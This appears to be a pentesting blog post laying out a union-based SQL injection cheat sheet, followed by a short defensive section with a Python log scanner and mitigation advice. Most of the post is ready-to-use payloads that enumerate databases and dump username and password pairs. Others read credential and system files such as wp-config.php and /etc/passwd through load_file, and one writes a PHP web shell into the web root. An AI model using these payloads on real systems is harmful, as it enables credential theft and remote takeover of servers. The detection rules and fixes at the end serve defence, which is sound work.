SQL INJECTION – Extracting Username and Password From Database



Hello, pentesters! In this article, we will look at how to extract the database name, table names, column names, and even usernames and passwords from a database.

Some Basic SQL Functions:

  • user()
  • version()
  • database()

1) Find Out User Information

  • union select user()
  • union select database()
  • union select version()

2) Find Out Database Name

  • union select group_concat(schema_name) from information_schema.schemata

3) Find Out Table Names

  • union select group_concat(table_name) from information_schema.tables where table_schema='#Database_Name'

4) Find Out Column Names

  • union select group_concat(column_name) from information_schema.columns where table_name='#Table_Name'

5) Extract Username And Password From Database

  • union select group_concat(username,':',password) from #table_name

6) Check All Privileges inside the Database

  • union select privilege_type FROM information_schema.user_privileges where grantee = "user()" #'uhc'@'localhost'

7) Read Arbitrary Operating System Files Through the Database

  • union select load_file('/etc/passwd')
  • union select load_file('/etc/os-release')
  • union select load_file('/var/www/wordpress/wp-config.php')
  • union select load_file('/etc/issue')
  • union select load_file('/var/log/apache2/access.log')
  • union select load_file('/etc/apache2/sites-available/000-default.conf')
  • union select load_file('/etc/fstab')

8) Create a Malicious PHP Shell Inside the Database

  • union select "<?php system($_REQUEST[pentestblog]);?>" into outfile '/var/www/html/shell.php'
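
For defenders, the payloads in steps 1 to 8 leave recognizable traces in web server logs. The Python sketch below is an added example, not code from the original post: it normalizes request lines (nested URL encoding, `/**/` comment padding, case) and flags the keywords used above. The log lines and the `/item.php?id=` endpoint are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Detection rules keyed to the numbered steps of this article.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),         # all steps
    ("fingerprint", re.compile(r"\b(?:user|database|version)\s*\(\s*\)")),  # step 1
    ("schema-enum", re.compile(r"\binformation_schema\s*\.")),              # steps 2-4, 6
    ("group_concat", re.compile(r"\bgroup_concat\s*\(")),                   # steps 2-5
    ("file-read", re.compile(r"\bload_file\s*\(")),                         # step 7
    ("file-write", re.compile(r"\binto\s+(?:out|dump)file\b")),             # step 8
]

def normalize(raw):
    """Undo up to three layers of URL encoding, then fold comments, spacing and case."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # /**/ acts as whitespace in SQL
    return re.sub(r"\s+", " ", text).lower()

def classify(request_line):
    """Return the names of all rules that match one request line."""
    text = normalize(request_line)
    return [name for name, pattern in RULES if pattern.search(text)]

def scan(lines):
    """Return (line_number, rule_names) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample log lines; /item.php?id= is a hypothetical endpoint.
SAMPLE_LOG = [
    "GET /item.php?id=7&sort=version HTTP/1.1",
    "GET /item.php?id=-1+union+select+group_concat(schema_name)+from+information_schema.schemata HTTP/1.1",
    "GET /item.php?id=-1%2520UNION%2520SELECT%2520load_file(%2527/etc/passwd%2527) HTTP/1.1",
    "GET /item.php?id=-1/**/union/**/select/**/user() HTTP/1.1",
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Keyword matching is a detection aid only; the fix for every step above is parameterized queries. For steps 7 and 8, a database account without the FILE privilege and a restrictive `secure_file_priv` setting keep `load_file` and `into outfile` from reaching the filesystem.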

The post SQL INJECTION – Extracting Username and Password From Database appeared first on Pentestblog.

